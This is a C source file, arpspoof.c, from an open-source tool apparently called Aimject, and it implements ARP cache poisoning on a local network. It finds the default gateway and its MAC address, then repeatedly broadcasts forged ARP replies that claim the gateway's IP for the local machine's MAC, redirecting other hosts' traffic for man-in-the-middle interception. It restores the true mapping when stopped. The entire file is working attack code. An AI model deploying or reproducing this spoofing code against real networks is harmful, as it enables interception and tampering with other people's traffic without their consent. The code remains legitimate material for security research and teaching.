/*
 * Aimject
 *
 * Copyright (C) 2006 Jon Oberheide <jon@oberheide.org>
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License as
 * published by the Free Software Foundation; either version 2 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
 * 02111-1307, USA.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <glib.h>
#include <dnet.h>
#include <gtk/gtk.h>
#include <glade/glade.h>
#include <config.h>

#include "arpspoof.h"
#include "main.h"

extern aimject_t *aj;

void
arp_send(eth_t *eth, gint type, eth_addr_t *s_ha, ip_addr_t s_pa,
	 eth_addr_t *t_ha, ip_addr_t t_pa)
{
	gchar arp_buf[ETH_HDR_LEN + ARP_HDR_LEN + ARP_ETHIP_LEN];
	gchar *s_ha_str, *s_pa_str, *t_ha_str, *t_pa_str;

	s_ha_str = g_strdup(eth_ntoa(s_ha));
	s_pa_str = g_strdup(ip_ntoa(&s_pa));
	t_ha_str = g_strdup(eth_ntoa(t_ha));
	t_pa_str = g_strdup(ip_ntoa(&t_pa));

	if (type == ARP_OP_REQUEST) {
		g_debug("arp request from %s to %s: who has %s tell %s",
			s_ha_str, t_ha_str, t_pa_str, s_pa_str);
	} else if (type == ARP_OP_REPLY) {
		g_debug("arp reply from %s to %s: %s is at %s",
			s_ha_str, t_ha_str, s_pa_str, s_ha_str);
	} else {
		g_debug("arp unknown from %s to %s", s_ha_str, t_ha_str);
	}

	eth_pack_hdr(arp_buf, ETH_ADDR_BROADCAST, *s_ha, ETH_TYPE_ARP);
	arp_pack_hdr_ethip(arp_buf + ETH_HDR_LEN, type,
			   *s_ha, s_pa, *t_ha, t_pa);
	eth_send(eth, arp_buf, sizeof(arp_buf));

	g_free(s_ha_str);
	g_free(s_pa_str);
	g_free(t_ha_str);
	g_free(t_pa_str);
}

gboolean
arp_timer(gpointer data)
{
	/* send spoofed arp */
	arp_send(aj->eth, ARP_OP_REPLY,
		 &aj->intf_ha, aj->s_pa,
		 &aj->t_ha, aj->t_pa);

	return TRUE;
}

gpointer
arpspoof_init(gpointer data)
{
	arp_t *a;
	route_t *r;
	gint i, res;
	GSource *timer;
	GMainContext *context;
	struct route_entry route_e;
	struct arp_entry arp_e;

	g_debug("arp spoofing thread spawned");

	context = g_main_context_new();
	aj->arp_loop = g_main_loop_new(context, FALSE);

	aj->eth = eth_open(aj->intf_str);
	g_assert(aj->eth != NULL);

	/* fetch ip address of gateway */
	r = route_open();
	g_assert(r != NULL);
	res = addr_aton("72.14.207.99", &route_e.route_dst);
	g_assert(res == 0);
	res = route_get(r, &route_e);
	g_assert(res == 0);
	memcpy(&aj->s_pa, &route_e.route_gw.addr_ip, sizeof(ip_addr_t)); 
	memcpy(&aj->t_ha, ETH_ADDR_BROADCAST, ETH_ADDR_LEN);
	aj->t_pa = IP_ADDR_ANY;
	route_close(r);

	/* fetch mac address of gateway */
	a = arp_open();
	g_assert(a != NULL);
	memcpy(&arp_e.arp_pa, &route_e.route_gw, sizeof(arp_e.arp_pa));
	while (arp_get(a, &arp_e) != 0) {
		g_debug("arping for gateway");
		/* arp for gateway mac */
		arp_send(aj->eth, ARP_OP_REQUEST,
			 &aj->intf_ha, aj->intf_pa,
			 &aj->t_ha, route_e.route_gw.addr_ip);
		sleep(1);
	}
	arp_close(a);

	g_debug("gateway ip: %s", addr_ntoa(&arp_e.arp_pa));
	g_debug("gateway mac: %s", addr_ntoa(&arp_e.arp_ha));

	timer = g_timeout_source_new(ARPSPOOF_TIMER);
	g_source_set_callback(timer, (GSourceFunc) arp_timer, NULL, NULL);
	g_source_attach(timer, context);
	g_source_unref(timer);

	g_main_loop_run(aj->arp_loop);
 
	g_source_destroy(timer);
	g_main_loop_unref(aj->arp_loop);
	g_main_context_unref(context);
	aj->arp_loop = NULL;

	/* restore previous arp state */
	g_debug("restoring arp state");
	for (i = 0; i < 3; ++i) {
		arp_send(aj->eth, ARP_OP_REPLY,
			 &arp_e.arp_ha.addr_eth, aj->s_pa,
			 &aj->t_ha, aj->t_pa);
		sleep(1);
	}

	eth_close(aj->eth);

	return NULL;
}
